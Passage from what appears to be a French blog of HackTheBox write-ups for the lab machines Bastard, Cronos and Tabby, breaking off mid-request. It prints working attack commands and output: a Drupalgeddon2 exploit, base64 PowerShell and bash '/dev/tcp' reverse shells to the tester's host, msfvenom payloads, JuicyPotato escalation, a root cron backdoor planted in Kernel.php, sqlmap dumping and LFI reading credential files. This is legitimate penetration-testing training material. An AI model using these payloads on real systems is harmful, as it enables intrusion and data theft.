Difficulty Bastard Windows 10.10.10.9 Medium Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 $ nmap -sC -sV -p- -An -vvv 10.10.10.9 Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-11 15:53 CEST PORTSTATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5 |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt | /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php | /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ | /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ | /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ |_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/ |_http-server-header: Microsoft-IIS/7.5 |_http-generator: Drupal 7 (http://drupal.org) |_http-title: Welcome to Bastard | Bastard 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Foothold Drupal 7.54 On découvre sur le port 80 une page de login. Il est mentionné qu\u0026rsquo;il s\u0026rsquo;agit d\u0026rsquo;un site web Drupal. On trouve la version de Drupal dans un fichier changelog.txt :\nhttp://10.10.10.9/changelog.txt Drupal 7.54, 2017-02-01\nCVE-2018-7600 | drupalgeddon2 En utilisant searchsploit, on trouve une RCE qui ne necessite pas d\u0026rsquo;authentification et qui fonctionne pour les versions avant 7.58 (donc OK pour 7.54).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ searchsploit drupal 7.54 ----------------------------------------------------------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- Drupal \u0026lt; 7.58 / \u0026lt; 8.3.9 / \u0026lt; 8.4.6 / \u0026lt; 8.5.1 - \u0026#39;Drupalgeddon2\u0026#39; Remote Code Execution | php/webapps/44449.rb ... $ searchsploit -m php/webapps/44449.rb Exploit: Drupal \u0026lt; 7.58 / \u0026lt; 8.3.9 / \u0026lt; 8.4.6 / \u0026lt; 8.5.1 - \u0026#39;Drupalgeddon2\u0026#39; Remote Code Execution URL: https://www.exploit-db.com/exploits/44449 Path: /opt/tools/exploitdb/exploits/php/webapps/44449.rb Codes: CVE-2018-7600 Verified: True File Type: Ruby script, ASCII text Copied to: /workspace/drupwn/44449.rb On lance l\u0026rsquo;exploitation, et on obtient directement un shell non-interactif sur lequel on peut executer des commandes.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 $ ruby 44449.rb http://10.10.10.9 [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.9/ -------------------------------------------------------------------------------- [+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200) [+] Drupal!: v7.54 -------------------------------------------------------------------------------- [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [+] Result : Clean URLs enabled -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo CGATSMRW [+] Result : CGATSMRW [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! -------------------------------------------------------------------------------- [*] Testing: Existing file (http://10.10.10.9/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/files/) [*] Moving : ./sites/default/files/.htaccess [i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? [!] FAILED : Couldn\u0026#39;t find a writeable web path -------------------------------------------------------------------------------- [*] Dropping back to direct OS commands drupalgeddon2\u0026gt;\u0026gt; ls drupalgeddon2\u0026gt;\u0026gt; whoami nt authority\\iusr drupalgeddon2\u0026gt;\u0026gt; dir Volume in drive C has no label. Volume Serial Number is C4CD-C60B Directory of C:\\inetpub\\drupal-7.54 19/03/2017 09:04 �� \u0026lt;DIR\u0026gt; . 19/03/2017 09:04 �� \u0026lt;DIR\u0026gt; .. 19/03/2017 01:42 �� 317 .editorconfig 19/03/2017 01:42 �� 174 .gitignore 19/03/2017 01:42 �� 5.969 .htaccess 19/03/2017 01:42 �� 6.604 authorize.php 19/03/2017 01:42 �� 110.781 CHANGELOG.txt 19/03/2017 01:42 �� 1.481 COPYRIGHT.txt 19/03/2017 01:42 �� 720 cron.php 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; includes 19/03/2017 01:42 �� 529 index.php 19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt 19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt 19/03/2017 01:42 �� 703 install.php 19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt 19/03/2017 01:42 ��17.995 INSTALL.txt 19/03/2017 01:42 ��18.092 LICENSE.txt 19/03/2017 01:42 �� 8.710 MAINTAINERS.txt 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; misc 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; modules 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; profiles 19/03/2017 01:42 �� 5.382 README.txt 19/03/2017 01:42 �� 2.189 robots.txt 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; scripts 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; sites 19/03/2017 01:43 �� \u0026lt;DIR\u0026gt; themes 19/03/2017 01:42 ��19.986 update.php 19/03/2017 01:42 ��10.123 UPGRADE.txt 19/03/2017 01:42 �� 2.200 web.config 19/03/2017 01:42 �� 417 xmlrpc.php 21 File(s) 217.261 bytes 9 Dir(s) 4.135.231.488 bytes free drupalgeddon2\u0026gt;\u0026gt; dir C:\\Users Volume in drive C has no label. Volume Serial Number is C4CD-C60B Directory of C:\\Users 19/03/2017 08:35 �� \u0026lt;DIR\u0026gt; . 19/03/2017 08:35 �� \u0026lt;DIR\u0026gt; .. 19/03/2017 02:20 �� \u0026lt;DIR\u0026gt; Administrator 19/03/2017 02:54 �� \u0026lt;DIR\u0026gt; Classic .NET AppPool 19/03/2017 08:35 �� \u0026lt;DIR\u0026gt; dimitris 14/07/2009 07:57 �� \u0026lt;DIR\u0026gt; Public 0 File(s) 0 bytes 6 Dir(s) 4.134.649.856 bytes free drupalgeddon2\u0026gt;\u0026gt; type C:\\Users\\dimitris\\Desktop\\user.txt 292f.....ec9d Stable Shell En allant sur https://www.revshells.com/, j\u0026rsquo;ai pu générer rapidement un script de revershell. J\u0026rsquo;ai utilisé :\nPowerShell #3 (Base64) Ce qui m\u0026rsquo;a donné la commande suivante. Pratique, car aucun caractère spécial.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgA1ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== ----------------------- exegol-pentest Bastard $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:57491. PS C:\\inetpub\\drupal-7.54\u0026gt; whoami nt authority\\iusr Better Stable Shell J\u0026rsquo;ai trouvé un moyen de faire un shell encore plus stable. Le privesc ne marchait meme pas avec l\u0026rsquo;autre shell\u0026hellip; On ne voyait pas les erreurs non plus. Il vaut mieu generer avec msfvenom un shell.exe :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.25 LPORT=9999 -a x64 --platform windows -e x64/xor_dynamic -b \u0026#39;\\x00\u0026#39; -f exe -o shell.exe -------------- PS C:\\inetpub\\drupal-7.54\u0026gt; .\\shell.exe -------------- $ nc -lnvp 9999 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:57676. Windows PowerShell running as user BASTARD$ on BASTARD Copyright (C) Microsoft Corporation. All rights reserved. PS C:\\inetpub\\drupal-7.54\u0026gt; Privilege Escalation SEImpersonatePrivilege - JuicyPotato On exploit avec JuicyPotato (j\u0026rsquo;ai vraiment beaucoup galérer\u0026hellip;). On génére un deuxieme rev shell en .exe sur un autre port :\n1 msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.25 LPORT=8888 -a x64 --platform windows -e x64/xor_dynamic -b \u0026#39;\\x00\u0026#39; -f exe -o shell2.exe On copie shell2.exe sur la machine puis on execute JuicyPotato.exe :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 PS C:\\inetpub\\drupal-7.54\u0026gt; ./JP.exe -p cmd.exe -a \u0026#39;/c C:\\inetpub\\drupal-7.54\\shell2.exe\u0026#39; -l 4444 -t * -c \u0026#39;{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}\u0026#39; Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 4444 .... [+] authresult 0 {9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\\SYSTEM [+] CreateProcessWithTokenW OK ------------------------------- exegol-pentest /workspace $ nc -lnvp 8888 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::8888 Ncat: Listening on 0.0.0.0:8888 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:57681. Windows PowerShell running as user BASTARD$ on BASTARD Copyright (C) Microsoft Corporation. All rights reserved. PS C:\\Windows\\system32\u0026gt; type C:\\Users\\Administrator\\Desktop\\root.txt 47f4.....3c54 Tips un reverse shell en utilisant msfvenom semble plus stable (affiche les erreurs aussi) que le powershell -e \u0026hellip;. que j\u0026rsquo;ai utilisé. Peut etre a utilisé en priorité la prochaine fois ? Attention au CLSID. Toujours tester plusieurs. NE JAMAIS FAIRE CONFIANCE A CELUI PAR DEFAUT. Regarder sur : https://ohpe.it/juicy-potato/CLSID/ https://github.com/ohpe/juicy-potato/tree/master/CLSID/ ","date":"2025-07-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/bastard-htb/","title":"HTB | Bastard"},{"content":" Machine name OS IP Difficulty Cronos Linux 10.10.10.13 Medium Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ nmap -sC -sV -p- -An -vvv 10.10.10.13 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18b973826f26c7788f1b3988d802cee8 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn | 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ= | 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx 53/tcp open domain syn-ack ttl 63 ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.18 (Ubuntu) Foothold dig 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ## dig axfr @10.10.10.13 cronos.htb ; \u0026lt;\u0026lt;\u0026gt;\u0026gt; DiG 9.18.33-1~deb12u2-Debian \u0026lt;\u0026lt;\u0026gt;\u0026gt; axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb.\t604800\tIN\tNS\tns1.cronos.htb. cronos.htb.\t604800\tIN\tA\t10.10.10.13 admin.cronos.htb.\t604800\tIN\tA\t10.10.10.13 ns1.cronos.htb.\t604800\tIN\tA\t10.10.10.13 www.cronos.htb.\t604800\tIN\tA\t10.10.10.13 cronos.htb.\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 20 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP) ;; WHEN: Thu Jul 10 22:16:46 CEST 2025 ;; XFR size: 7 records (messages 1, bytes 203) admin.cronos.htb login page sqlmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; \u0026gt; username field is vulnerable to blind SQL Injection ! sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; --current-db \u0026gt; admin sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; -D admin --tables \u0026gt; users sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; -D admin -T users --columns \u0026gt; Too slow... Trying to guess \u0026#34;password\u0026#34; field and it works ! sqlmap --forms --batch -u \u0026#34;http://admin.cronos.htb/\u0026#34; -D admin -T users -C password --dump \u0026gt; 4f5fffa7b2340178a716e3832451e058 Sur crackstation : Not found. Hashcat avec rockyou.txt : Not found.\nJ\u0026rsquo;ai cherché le hachage sur google : \u0026ldquo;4f5fffa7b2340178a716e3832451e058\u0026rdquo; Bingo ! On trouve le mot de passe : 1327663704\nOn essaye les credentials sur la page de login de admin.cronos.htb et ça marche :\nuser: admin pass: 1327663704 Après review du code source (plus tard) on découvre que : $myusername = $_POST[\u0026lsquo;username\u0026rsquo;]; $mypassword = md5($_POST[\u0026lsquo;password\u0026rsquo;]);\nCommand Injection - admin dashboard On peut faire des ping et des traceroute sur la page d\u0026rsquo;admin. En utilisant burp on peut modifier la commande pour executer ce qu\u0026rsquo;on veut. On peut alors executer un reverse shell vers notre machine :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 POST /welcome.php HTTP/1.1 Host: admin.cronos.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 16 Origin: http://admin.cronos.htb Connection: keep-alive Referer: http://admin.cronos.htb/welcome.php Cookie: PHPSESSID=0p5lct2jjmbq5neupststnl996 Upgrade-Insecure-Requests: 1 Priority: u=0, i command=echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMSAwPiYx+|+base64+-d+|+bash\u0026amp;host=z ------------------------ $ nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:55658. sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ export TERM=xterm $ python3 -V Python 3.5.2 $ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@cronos:/var/www/admin$ ^Z [2] + 27640 suspended nc -lnvp 9001 [Jul 10, 2025 - 23:33:12 (CEST)] exegol-pentest Cronos # stty raw -echo;fg [2] - 27640 continued nc -lnvp 9001 www-data@cronos:/var/www/admin$ whoami www-data www-data@cronos:/var/www/admin$ cd /home www-data@cronos:/home$ cd noulis/ www-data@cronos:/home/noulis$ cat user.txt fe30.....e498 www-data -\u0026gt; root laravel root crontab En utilisant linpeas, on s\u0026rsquo;en compte que l\u0026rsquo;utilisateur root execute chaque minute :\nphp /var/www/laravel/artisan schedule:run \u0026raquo; /dev/null 2\u0026gt;\u0026amp;1\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 ╔══════════╣ Check for vulnerable cron jobs ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs ══╣ Cron jobs list ... SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 17 *\t* * *\troot cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.hourly 25 6\t* * *\troot\ttest -x /usr/sbin/anacron || ( cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.daily ) 47 6\t* * 7\troot\ttest -x /usr/sbin/anacron || ( cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.weekly ) 52 6\t1 * *\troot\ttest -x /usr/sbin/anacron || ( cd / \u0026amp;\u0026amp; run-parts --report /etc/cron.monthly ) * * * * *\troot\tphp /var/www/laravel/artisan schedule:run \u0026gt;\u0026gt; /dev/null 2\u0026gt;\u0026amp;1 Grâce à ChatGPT, on comprend qu\u0026rsquo;il faut modifier le fichier /var/www/laravel/app/Console/Kernel.php. La fonction schedule de ce fichier est executé toutes les minutes par root. Il suffit donc d\u0026rsquo;executer une commande de reverse shell et le tour est joué.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 www-data@cronos:/var/www/laravel/app/Console$ head Kernel.php -n100 \u0026lt;?php namespace App\\Console; use Illuminate\\Console\\Scheduling\\Schedule; use Illuminate\\Foundation\\Console\\Kernel as ConsoleKernel; class Kernel extends ConsoleKernel { /** * The Artisan commands provided by your application. * * @var array */ protected $commands = [ // ]; /** * Define the application\u0026#39;s command schedule. * * @param \\Illuminate\\Console\\Scheduling\\Schedule $schedule * @return void */ protected function schedule(Schedule $schedule) { $schedule-\u0026gt;exec(\u0026#39;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMiAwPiYx | base64 -d | bash\u0026#39;)-\u0026gt;everyMinute(); // $schedule-\u0026gt;command(\u0026#39;inspire\u0026#39;) // -\u0026gt;hourly(); } /** * Register the Closure based commands for the application. * * @return void */ protected function commands() { require base_path(\u0026#39;routes/console.php\u0026#39;); } } Au bout d\u0026rsquo;une minute, on reçoit bien un shell en tant que root.\n1 2 3 4 5 6 7 8 9 10 11 ## nc -lnvp 9002 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9002 Ncat: Listening on 0.0.0.0:9002 Ncat: Connection from 10.10.10.13. Ncat: Connection from 10.10.10.13:38926. sh: 0: can\u0026#39;t access tty; job control turned off # whoami root # cat /root/root.txt\t3c1c.....64e8 Tips Toujours faire un sqlmap sur une page de login si on ne trouve rien ! Tester un \u0026ldquo;\u0026rsquo; or 1=1; \u0026ndash;\u0026rdquo; n\u0026rsquo;est pas suffisant. Il y a bcp de sql injection que l\u0026rsquo;on peut decouvrir avec SQLMAP\u0026hellip; ","date":"2025-07-11T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/cronos-htb/","title":"HTB | Cronos"},{"content":" Machine name OS IP Difficulty Tabby Linux 10.10.10.194 Easy System Info 1 Ubuntu Users 1 2 tomcat : $3cureP4s5w0rd123! ash : admin@it Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 $ nmap -sC -sV -p- -An -T4 10.10.10.194 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA) | 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA) |_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Mega Hosting |_http-server-header: Apache/2.4.41 (Ubuntu) 8080/tcp open http Apache Tomcat |_http-title: Apache Tomcat Foothold Apache Tomcat - LFI 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 http://megahosting.htb/news.php?file=../../../../../../../../etc/passwd \u0026lt;\u0026lt;------------\u0026gt;\u0026gt; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false tomcat:x:997:997::/opt/tomcat:/bin/false mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false ash:x:1000:1000:clive:/home/ash:/bin/bash Tomcat Credentials using LFI En utilisant la LFI sur le site web port 80, on peut retrouver les creds pour le serveur apache tomcat présent sur le port 8080:\n1 2 3 4 5 6 7 8 9 10 GET /news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1 ------------------------- ... \u0026lt;user username=\u0026#34;role1\u0026#34; password=\u0026#34;\u0026lt;must-be-changed\u0026gt;\u0026#34; 